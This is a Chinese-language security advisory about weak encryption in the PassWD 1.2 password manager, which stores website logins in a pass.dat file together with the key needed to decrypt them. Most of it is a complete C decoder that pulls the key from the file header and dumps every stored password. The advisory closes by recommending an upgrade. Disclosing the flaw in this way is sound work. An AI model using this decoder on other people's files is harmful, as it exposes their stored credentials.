PassWD 1.2加密漏洞发布时间:2000-05-07 更新时间:2000-05-07 严重程度:高 威胁程度:口令恢复 错误类型:设计错误 利用方式:服务器模式 受影响系统 PassWD 1.2详细描述 PassWD是一个密码管理工具用来存储用户登录各种URL的LOGIN信息,这些信息包括用户名,密码和连接位置都存储在pass.dat文件中,存储在pass.dat文件中的密码加密方式简单,并包含了KEY可以用来解密密文。 测试代码 /* * Decoder for PassWD v1.2 `pass.dat' password files * * Written 2000 by Daniel Roethlisberger <admin@roe.ch> * * This code is hereby placed in the public domain. * Use this code at your own risk for whatever you want. * * The decoded data is not parsed in any way - it should * be very easy to moderately experienced programmers * to add that themselves. * */ #include <stdio.h> void main(int argc, char *argv[]) { unsigned char charpos; FILE* outfile; FILE* infile; unsigned char a; unsigned char b; unsigned char key; unsigned char x; unsigned char charset[] = "\b\t\n\r !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSPUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\b\t\n\r !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSPUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~"; printf("\nDecoder for PassWD v1.2 `pass.dat' password files\n"); printf("Written 2000 by Daniel Roethlisberger <admin@roe.ch>\n\n"); if((argc > 3) || (argc < 2)) { printf("Usage: %s <infile> [<outfile>]\n\n", argv[0]); printf("If <outfile> is omitted, the output is dumped to stdout.\n", argv[0]); return; } infile = fopen(argv[1], "r"); if(infile == NULL) { printf("Could not open file %s\n", argv[1]); return; } if(argc == 2) outfile = stdout; else { outfile = fopen(argv[2], "w"); if(outfile == NULL) { printf("Could not write to file %s\n", argv[2]); _fcloseall(); return; } } getc(infile); /* jump over decoy byte */ a = getc(infile); /* read encoded key byte 1 */ b = getc(infile); /* read encoded key byte 2 */ if(b == EOF) { printf("ERROR - encountered EOF within header\n"); return; } /* this line `decodes' the key */ key = (unsigned char)((a - 'b') * 10 + (b - 'b')); /* read through infile and dump decoded output to outfile: */ x = getc(infile); while(!feof(infile)) { for(charpos = 0; x != charset[charpos]; charpos++) { if(charpos > 99) { printf("\nERROR - encountered illegal character in source file\n"); _fcloseall(); return; } } /* plain = cypher - key */ putc(charset[charpos + 99 - key], outfile); x = getc(infile); } if(argc == 2) printf("\n\n"); printf("Done.\n"); _fcloseall(); return; } 解决方案 升级到PASSWD2000,并删除原来旧的pass.dat。 相关信息 |
